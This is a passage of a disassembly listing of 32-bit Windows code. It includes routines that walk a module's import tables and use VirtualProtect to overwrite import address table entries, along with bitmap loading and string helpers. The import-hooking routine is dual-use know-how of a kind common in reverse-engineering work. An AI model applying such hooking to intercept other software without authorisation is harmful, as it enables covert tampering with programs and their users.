var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E460
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp [ebp+arg_0], 0
jnz short loc_505101
jmp loc_5053BC
; ---------------------------------------------------------------------------
loc_505101: ; CODE XREF: sub_5050D0+2A�j
mov eax, [ebp+arg_0]
mov [ebp+var_2C], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_30], edx
jmp short loc_50511E
; ---------------------------------------------------------------------------
loc_505115: ; CODE XREF: sub_5050D0:loc_505133�j
mov eax, [ebp+var_30]
mov ecx, [eax+4]
mov [ebp+var_30], ecx
loc_50511E: ; CODE XREF: sub_5050D0+43�j
cmp [ebp+var_30], 0
jz short loc_505135
mov edx, [ebp+var_30]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jnz short loc_505133
jmp loc_5053BC
; ---------------------------------------------------------------------------
loc_505133: ; CODE XREF: sub_5050D0+5C�j
jmp short loc_505115
; ---------------------------------------------------------------------------
loc_505135: ; CODE XREF: sub_5050D0+52�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_50B871
test eax, eax
jz short loc_50514A
jmp loc_5053BC
; ---------------------------------------------------------------------------
loc_50514A: ; CODE XREF: sub_5050D0+73�j
mov edx, ds:dword_511914
add edx, 1
mov ds:dword_511914, edx
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov ecx, ds:off_510BE8
mov [ebp+var_24], ecx
mov [ebp+var_4], 0
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
add eax, [edx+3Ch]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
cmp dword ptr [ecx], 4550h
jnz loc_505371
cmp ds:dword_511680, 1
jnz short loc_5051AA
cmp [ebp+arg_0], 80000000h
jbe short loc_5051AA
push 0
push 0
push 0
push 0
call ds:dword_511778 ; RaiseException
loc_5051AA: ; CODE XREF: sub_5050D0+C1�j
; sub_5050D0+CA�j
mov edx, [ebp+var_38]
mov eax, [ebp+var_34]
add eax, [edx+80h]
mov [ebp+var_20], eax
mov [ebp+var_4], 1
cmp ds:dword_511680, 1
jnz short loc_505247
mov [ebp+var_40], 0
jmp short loc_5051DB
; ---------------------------------------------------------------------------
loc_5051D2: ; CODE XREF: sub_5050D0:loc_505245�j
mov ecx, [ebp+var_40]
add ecx, 1
mov [ebp+var_40], ecx
loc_5051DB: ; CODE XREF: sub_5050D0+100�j
mov edx, [ebp+var_38]
xor eax, eax
mov ax, [edx+6]
cmp [ebp+var_40], eax
jnb short loc_505247
mov ecx, [ebp+var_38]
xor edx, edx
mov dx, [ecx+14h]
mov eax, [ebp+var_38]
lea ecx, [eax+edx+18h]
mov edx, [ebp+var_40]
imul edx, 28h
add ecx, edx
mov [ebp+var_44], ecx
mov eax, [ebp+var_44]
mov ecx, [ebp+var_34]
add ecx, [eax+0Ch]
cmp ecx, [ebp+var_20]
ja short loc_505245
mov edx, [ebp+var_44]
mov eax, [ebp+var_34]
add eax, [edx+0Ch]
mov ecx, [ebp+var_44]
add eax, [ecx+8]
cmp [ebp+var_20], eax
ja short loc_505245
mov edx, [ebp+var_44]
mov eax, [edx+24h]
and eax, 10000000h
test eax, eax
jz short loc_505243
push 0
push 0
push 0
push 0
call ds:dword_511778 ; RaiseException
loc_505243: ; CODE XREF: sub_5050D0+163�j
jmp short loc_505247
; ---------------------------------------------------------------------------
loc_505245: ; CODE XREF: sub_5050D0+140�j
; sub_5050D0+154�j
jmp short loc_5051D2
; ---------------------------------------------------------------------------
loc_505247: ; CODE XREF: sub_5050D0+F7�j
; sub_5050D0+117�j ...
mov [ebp+var_4], 0
jmp short loc_50526E
; ---------------------------------------------------------------------------
loc_505250: ; DATA XREF: _6:0050E470�o
mov ecx, [ebp+var_14]
mov edx, [ecx]
mov eax, [edx]
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_505264: ; DATA XREF: _6:0050E474�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_50526E: ; CODE XREF: sub_5050D0+17E�j
mov ecx, [ebp+var_38]
mov eax, [ecx+84h]
xor edx, edx
mov ecx, 14h
div ecx
mov [ebp+var_1C], eax
mov [ebp+var_3C], 0
jmp short loc_505295
; ---------------------------------------------------------------------------
loc_50528C: ; CODE XREF: sub_5050D0:loc_50536C�j
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_505295: ; CODE XREF: sub_5050D0+1BA�j
mov eax, [ebp+var_3C]
cmp eax, [ebp+var_1C]
jnb loc_505371
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
mov eax, [ebp+var_34]
add eax, [edx+ecx+0Ch]
mov [ebp+var_50], eax
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
cmp dword ptr [edx+ecx+0Ch], 0
jz short loc_5052DD
mov eax, [ebp+var_3C]
imul eax, 14h
mov ecx, [ebp+var_20]
mov edx, [ecx+eax+0Ch]
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+edx]
test ecx, ecx
jnz short loc_5052E2
loc_5052DD: ; CODE XREF: sub_5050D0+1F2�j
jmp loc_505371
; ---------------------------------------------------------------------------
loc_5052E2: ; CODE XREF: sub_5050D0+20B�j
mov edx, [ebp+var_3C]
imul edx, 14h
mov eax, [ebp+var_20]
mov ecx, [ebp+var_34]
add ecx, [eax+edx+10h]
mov [ebp+var_48], ecx
mov edx, [ebp+var_50]
push edx
call sub_50AF8C
mov [ebp+var_4C], eax
mov eax, [ebp+var_50]
mov ds:off_510BE8, eax
cmp [ebp+var_4C], 0
jz short loc_505323
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_4C]
push eax
call sub_5050D0
add esp, 0Ch
loc_505323: ; CODE XREF: sub_5050D0+23D�j
push 0
call ds:dword_511718 ; GetModuleHandleA
cmp eax, [ebp+arg_0]
jz short loc_50536C
mov ecx, [ebp+var_4C]
push ecx
mov ecx, ds:dword_5160D8
call sub_50B871
test eax, eax
jz short loc_50536C
jmp short loc_50534E
; ---------------------------------------------------------------------------
loc_505345: ; CODE XREF: sub_5050D0+29A�j
; DATA XREF: _2:off_4545C0�o ...
mov edx, [ebp+var_48]
add edx, 4
mov [ebp+var_48], edx
loc_50534E: ; CODE XREF: sub_5050D0+273�j
mov eax, [ebp+var_48]
cmp dword ptr [eax], 0
jz short loc_50536C
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_48]
push eax
call sub_5053D0
add esp, 0Ch
jmp short loc_505345
; ---------------------------------------------------------------------------
loc_50536C: ; CODE XREF: sub_5050D0+25E�j
; sub_5050D0+271�j ...
jmp loc_50528C
; ---------------------------------------------------------------------------
loc_505371: ; CODE XREF: sub_5050D0+B4�j
; sub_5050D0+1CB�j ...
push 1
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_50B98E
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_5053A5
; ---------------------------------------------------------------------------
mov edx, [ebp+var_14]
mov eax, [edx]
mov ecx, [eax]
mov [ebp+var_54], ecx
mov eax, [ebp+var_54]
neg eax
sbb eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 0FFFFFFFFh
loc_5053A5: ; CODE XREF: sub_5050D0+2B6�j
mov eax, [ebp+var_24]
mov ds:off_510BE8, eax
mov ecx, ds:dword_511914
sub ecx, 1
mov ds:dword_511914, ecx
loc_5053BC: ; CODE XREF: sub_5050D0+2C�j
; sub_5050D0+5E�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_5050D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5053D0 proc near ; CODE XREF: sub_504AB0+282�p
; sub_5050D0+292�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp ds:dword_5160D4, 0
jnz short loc_5053F0
mov ecx, 0EF00000Ah
call sub_508342
loc_5053F0: ; CODE XREF: sub_5053D0+14�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, ds:dword_5160D4
call sub_50B871
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_50544F
lea edx, [ebp+var_10]
push edx
push 4
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_5117AC ; VirtualProtect
test eax, eax
jnz short loc_50542A
mov ecx, 0EF00000Bh
call sub_508342
loc_50542A: ; CODE XREF: sub_5053D0+4E�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ecx], eax
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_10]
push edx
push 4
mov eax, [ebp+arg_0]
push eax
loc_505442: ; DATA XREF: _2:off_44BEA0�o
call ds:dword_5117AC ; VirtualProtect
mov [ebp+var_4], 1
loc_50544F: ; CODE XREF: sub_5053D0+38�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_5053D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505456 proc near ; CODE XREF: sub_4FC3F3+23�p
; sub_4FF036+A5�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_1E = dword ptr -1Eh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E478
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 6Ch
push ebx
push esi
push edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_4], 0
and [ebp+var_3C], 0
lea eax, [ebp+var_34]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push 0Eh
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call sub_501177
test eax, eax
jz short loc_5054B7
lea eax, [ebp+var_44]
push eax
push [ebp+arg_0]
call sub_500672
test eax, eax
jnz short loc_5054D0
loc_5054B7: ; CODE XREF: sub_505456+4F�j
push 0FFFFFFFFh
and [ebp+var_64], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_5054D0: ; CODE XREF: sub_505456+5F�j
movzx eax, [ebp+var_28]
cmp eax, 4D42h
jnz short loc_505534
mov eax, [ebp+var_26]
cmp eax, [ebp+var_44]
ja short loc_505534
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
call sub_50835A
pop ecx
mov [ebp+var_5C], eax
mov eax, [ebp+var_5C]
mov [ebp+var_30], eax
lea eax, [ebp+var_48]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
push [ebp+var_30]
push [ebp+arg_0]
call sub_501177
test eax, eax
jnz short loc_505532
push 0FFFFFFFFh
and [ebp+var_68], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_505532: ; CODE XREF: sub_505456+C1�j
jmp short loc_50554D
; ---------------------------------------------------------------------------
loc_505534: ; CODE XREF: sub_505456+83�j
; sub_505456+8B�j
push 0FFFFFFFFh
and [ebp+var_6C], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_6C]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_50554D: ; CODE XREF: sub_505456:loc_505532�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_38], eax
mov eax, [ebp+var_30]
cmp dword ptr [eax+10h], 0
jz short loc_505577
push 0FFFFFFFFh
and [ebp+var_70], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_70]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_505577: ; CODE XREF: sub_505456+106�j
push 0
call ds:dword_5117E0 ; CreateCompatibleDC
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_5055A1
push 0FFFFFFFFh
and [ebp+var_74], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_74]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_5055A1: ; CODE XREF: sub_505456+130�j
mov eax, [ebp+var_1E]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-0Eh]
mov [ebp+var_40], eax
and [ebp+var_4C], 0
and [ebp+var_54], 0
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+0Eh]
mov [ebp+var_78], eax
cmp [ebp+var_78], 8
jz short loc_5055F5
cmp [ebp+var_78], 10h
jz short loc_5055EC
cmp [ebp+var_78], 18h
jz short loc_5055E3
cmp [ebp+var_78], 20h
jz short loc_5055DA
jmp short loc_5055FE
; ---------------------------------------------------------------------------
loc_5055DA: ; CODE XREF: sub_505456+180�j
mov [ebp+var_4C], 4
jmp short loc_505617
; ---------------------------------------------------------------------------
loc_5055E3: ; CODE XREF: sub_505456+17A�j
mov [ebp+var_4C], 3
jmp short loc_505617
; ---------------------------------------------------------------------------
loc_5055EC: ; CODE XREF: sub_505456+174�j
mov [ebp+var_4C], 2
jmp short loc_505617
; ---------------------------------------------------------------------------
loc_5055F5: ; CODE XREF: sub_505456+16E�j
mov [ebp+var_4C], 1
jmp short loc_505617
; ---------------------------------------------------------------------------
loc_5055FE: ; CODE XREF: sub_505456+182�j
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_505617: ; CODE XREF: sub_505456+18B�j
; sub_505456+194�j ...
push 0
push 0
lea eax, [ebp+var_58]
push eax
push 0
push [ebp+var_30]
push [ebp+var_2C]
call ds:dword_5117E4 ; CreateDIBSection
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_50564F
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_5056DC
; ---------------------------------------------------------------------------
loc_50564F: ; CODE XREF: sub_505456+1DE�j
mov eax, [ebp+var_30]
mov eax, [eax+4]
imul eax, [ebp+var_4C]
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
test edx, edx
jz short loc_50567F
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
push 4
pop eax
sub eax, edx
mov ecx, [ebp+var_50]
add ecx, eax
mov [ebp+var_50], ecx
loc_50567F: ; CODE XREF: sub_505456+211�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_50]
imul ecx, [eax+8]
mov esi, [ebp+var_40]
mov edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0FFFFFFFFh
mov eax, [ebp+var_54]
mov [ebp+var_84], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp short loc_5056DC
; ---------------------------------------------------------------------------
loc_5056BB: ; DATA XREF: _6:0050E480�o
cmp [ebp+var_2C], 0
jz short loc_5056CA
push [ebp+var_2C]
call ds:dword_5117E8 ; DeleteDC
loc_5056CA: ; CODE XREF: sub_505456+269�j
mov eax, [ebp+var_30]
mov [ebp+var_60], eax
push [ebp+var_60]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_5056DC: ; CODE XREF: sub_505456+75�j
; sub_505456+D7�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_505456 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5056EB proc near ; CODE XREF: sub_5061E1+969�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push 0
push [ebp+arg_0]
call sub_5092CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_50570F
; ---------------------------------------------------------------------------
loc_505708: ; CODE XREF: sub_5056EB+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_50570F: ; CODE XREF: sub_5056EB+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_50572D
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_4FC86E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_505708
; ---------------------------------------------------------------------------
loc_50572D: ; CODE XREF: sub_5056EB+2C�j
push 0Ch
call sub_50835A
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_8]
mov [eax+8], ecx
mov eax, [ebp+var_C]
leave
retn
sub_5056EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50575D proc near ; CODE XREF: sub_504AB0+9F�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push 0
push [ebp+arg_4]
call sub_5092CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_505781
; ---------------------------------------------------------------------------
loc_50577A: ; CODE XREF: sub_50575D+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_505781: ; CODE XREF: sub_50575D+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_50579F
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_4FC86E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_50577A
; ---------------------------------------------------------------------------
loc_50579F: ; CODE XREF: sub_50575D+2C�j
; sub_50575D:loc_505818�j
cmp [ebp+arg_0], 0
jz short loc_50581A
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_C]
mov eax, [eax]
mov [ebp+var_14], eax
loc_5057C2: ; CODE XREF: sub_50575D+97�j
mov eax, [ebp+var_14]
mov al, [eax]
mov [ebp+var_15], al
mov ecx, [ebp+var_10]
cmp al, [ecx]
jnz short loc_5057FC
cmp [ebp+var_15], 0
jz short loc_5057F6
mov eax, [ebp+var_14]
mov al, [eax+1]
mov [ebp+var_16], al
mov ecx, [ebp+var_10]
cmp al, [ecx+1]
jnz short loc_5057FC
add [ebp+var_14], 2
add [ebp+var_10], 2
cmp [ebp+var_16], 0
jnz short loc_5057C2
loc_5057F6: ; CODE XREF: sub_50575D+78�j
and [ebp+var_1C], 0
jmp short loc_505804
; ---------------------------------------------------------------------------
loc_5057FC: ; CODE XREF: sub_50575D+72�j
; sub_50575D+89�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
loc_505804: ; CODE XREF: sub_50575D+9D�j
mov eax, [ebp+var_1C]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_505818
mov eax, [ebp+var_C]
mov eax, [eax+4]
jmp short locret_50581C
; ---------------------------------------------------------------------------
loc_505818: ; CODE XREF: sub_50575D+B1�j
jmp short loc_50579F
; ---------------------------------------------------------------------------
loc_50581A: ; CODE XREF: sub_50575D+46�j
xor eax, eax
locret_50581C: ; CODE XREF: sub_50575D+B9�j
leave
retn
sub_50575D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50581E proc near ; CODE XREF: sub_5058CF+86�p
; sub_5061E1+D8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
movzx eax, ds:byte_511694
test eax, eax
jnz short loc_50587C
push offset dword_510C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_501AE2
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_505863
push offset dword_510C88
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_5019D2
mov [ebp+var_8], eax
loc_505863: ; CODE XREF: sub_50581E+30�j
cmp [ebp+var_8], 0
jnz short loc_50587C
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
push [ebp+var_C]
call sub_5083DD
pop ecx
and [ebp+var_4], 0
loc_50587C: ; CODE XREF: sub_50581E+17�j
; sub_50581E+49�j
cmp [ebp+arg_4], 0
jz short loc_50588C
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
jmp short loc_50589B
; ---------------------------------------------------------------------------
loc_50588C: ; CODE XREF: sub_50581E+62�j
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_5083DD
pop ecx
loc_50589B: ; CODE XREF: sub_50581E+6C�j
mov eax, [ebp+var_8]
leave
retn
sub_50581E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5058A0 proc near ; CODE XREF: sub_505BD7+41�p
; sub_505BD7+37C�p ...
push ebp
mov ebp, esp
cmp ds:dword_51195C, 0
jnz short loc_5058C2
push offset aKernel32_dll_0 ; "kernel32.dll"
push offset aGetcurrentpr_0 ; "GetCurrentProcessId"
call sub_509C22
pop ecx
pop ecx
mov ds:dword_51195C, eax
loc_5058C2: ; CODE XREF: sub_5058A0+A�j
call ds:dword_51195C
xor eax, 0CABEFA10h
pop ebp
retn
sub_5058A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5058CF proc near ; CODE XREF: sub_505AD2+C�p
; sub_50AF8C+2B�p
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 34h
mov [ebp+var_34], dl
mov [ebp+var_30], ecx
push offset sub_50BB0D
push ds:dword_5117C0
push [ebp+var_30]
mov ecx, ds:dword_511954
call sub_50B891
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_50594E
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_505946
push 400h
call sub_50835A
pop ecx
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
push 400h
push [ebp+var_10]
push [ebp+var_C]
call ds:dword_511714 ; GetModuleFileNameA
test eax, eax
jz short loc_505937
push [ebp+var_10]
call ds:dword_51175C ; LoadLibraryA
loc_505937: ; CODE XREF: sub_5058CF+5D�j
mov eax, [ebp+var_10]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_5083DD
pop ecx
loc_505946: ; CODE XREF: sub_5058CF+34�j
mov eax, [ebp+var_C]
jmp locret_505A3F
; ---------------------------------------------------------------------------
loc_50594E: ; CODE XREF: sub_5058CF+2C�j
push 0
push 0
push [ebp+var_30]
call sub_50581E
add esp, 0Ch
mov [ebp+var_8], eax
and [ebp+var_4], 0
cmp [ebp+var_8], 0
jz short loc_5059B3
push 0
push 0
push [ebp+var_8]
call sub_508892
add esp, 0Ch
mov [ebp+var_14], eax
push [ebp+var_14]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_50599F
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_50599F
push [ebp+var_14]
call ds:dword_51175C ; LoadLibraryA
loc_50599F: ; CODE XREF: sub_5058CF+BD�j
; sub_5058CF+C5�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_5083DD
pop ecx
jmp loc_505A3C
; ---------------------------------------------------------------------------
loc_5059B3: ; CODE XREF: sub_5058CF+99�j
push [ebp+var_30]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_505A3C
movzx eax, [ebp+var_34]
test eax, eax
jz short loc_505A3C
push 400h
call sub_50835A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_18], eax
push 400h
push [ebp+var_18]
push [ebp+var_4]
call ds:dword_511714 ; GetModuleFileNameA
test eax, eax
jz short loc_5059FF
push [ebp+var_18]
call ds:dword_51175C ; LoadLibraryA
loc_5059FF: ; CODE XREF: sub_5058CF+125�j
mov eax, [ebp+var_18]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_5083DD
pop ecx
push [ebp+var_30]
push [ebp+var_4]
call sub_505070
test eax, eax
jnz short loc_505A3C
call ds:dword_511710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_505A2F
push 7Eh
call ds:dword_51178C ; RtlRestoreLastWin32Error
loc_505A2F: ; CODE XREF: sub_5058CF+156�j
push [ebp+var_4]
call ds:dword_5116E0 ; FreeLibrary
and [ebp+var_4], 0
loc_505A3C: ; CODE XREF: sub_5058CF+DF�j
; sub_5058CF+F4�j ...
mov eax, [ebp+var_4]
locret_505A3F: ; CODE XREF: sub_5058CF+7A�j
leave
retn
sub_5058CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505A41 proc near ; CODE XREF: sub_50B076+4E�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00505AC3 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E488
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_28], ecx
push 105h
call sub_50835A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
stosb
and [ebp+var_4], 0
push 104h
push [ebp+var_1C]
push [ebp+var_28]
call ds:dword_511714 ; GetModuleFileNameA
push [ebp+var_1C]
push [ebp+var_28]
call sub_505070
or [ebp+var_4], 0FFFFFFFFh
call sub_505AB3
jmp short loc_505AC3
sub_505A41 endp
; =============== S U B R O U T I N E =======================================
sub_505AB3 proc near ; CODE XREF: sub_505A41+6B�p
; DATA XREF: _6:0050E490�o
mov eax, [ebp-1Ch]
mov [ebp-24h], eax
push dword ptr [ebp-24h]
call sub_5083DD
pop ecx
retn
sub_505AB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_505A41
loc_505AC3: ; CODE XREF: sub_505A41+70�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_505A41
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_505AD2 proc near ; CODE XREF: sub_50AE2D+19�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov dl, 1
mov ecx, [ebp+var_4]
call sub_5058CF
leave
retn
